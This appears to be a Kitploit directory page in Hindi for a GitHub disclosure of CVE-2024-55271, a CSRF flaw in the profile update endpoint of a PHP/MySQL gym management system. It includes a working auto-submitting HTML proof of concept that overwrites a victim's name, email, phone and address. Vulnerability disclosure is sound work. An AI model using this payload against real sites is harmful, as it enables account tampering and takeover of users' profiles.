Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-55271 — PHP और MYSQL का उपयोग कर जिम प्रबंधन प्रणाली | Kitploit
उपकरण/GitHubGitHub/shoaibalam112/cve-2024-55271
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshoaibalam112/cve-2024-55271

CVE-2024-55271

PHP और MYSQL का उपयोग कर जिम प्रबंधन प्रणाली

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

जिम प्रबंधन प्रणाली ( CVE-2024-55271 )

PHP और MySQL का उपयोग करके बनाया गया एक जिम प्रबंधन प्रणाली।

लेखा परीक्षक

Shoaib Alam - LinkedIn प्रोफ़ाइल

विवरण

प्रोफ़ाइल अपडेट अनुभाग में CSRF कमज़ोरी

जिम प्रबंधन प्रणाली में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) कमज़ोरी की पहचान की गई है। यह समस्या उपयोगकर्ता पैनल की प्रोफ़ाइल अपडेट कार्यक्षमता में मौजूद है।

एप्लिकेशन में वर्तमान में एंटी-CSRF टोकन का कार्यान्वयन नहीं है, जिसके परिणामस्वरूप क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) हमलों की कमज़ोरी है। यह सुरक्षा कमज़ोरी विशेष रूप से /profile.php एंडपॉइंट को प्रभावित करती है। एक हमलावर इस दोष का शोषण करके संवेदनशील उपयोगकर्ता जानकारी, जैसे पता, नाम और फ़ोन नंबर में अनधिकृत संशोधन कर सकता है। यह संभावित रूप से उपयोगकर्ता खातों की अखंडता से समझौता कर सकता है और आगे सुरक्षा समस्याओं को जन्म दे सकता है।

कमज़ोर एंडपॉइंट: /profile.php

प्रूफ ऑफ कॉन्सेप्ट (PoC)

नीचे एक प्रूफ ऑफ कॉन्सेप्ट है जो CSRF कमज़ोरी को प्रदर्शित करता है। यह PoC Burp Suite Professional का उपयोग करके उत्पन्न किया गया था।

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/gym/profile.php" method="POST">
      <input type="hidden" name="fname" value="hacked" />
      <input type="hidden" name="lname" value="victim" />
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="mobile" value="9999999999" />
      <input type="hidden" name="state" value="hacked" />
      <input type="hidden" name="city" value="hacked" />
      <input type="hidden" name="address" value="hacked" />
      <input type="hidden" name="submit" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
टूल डाउनलोड करें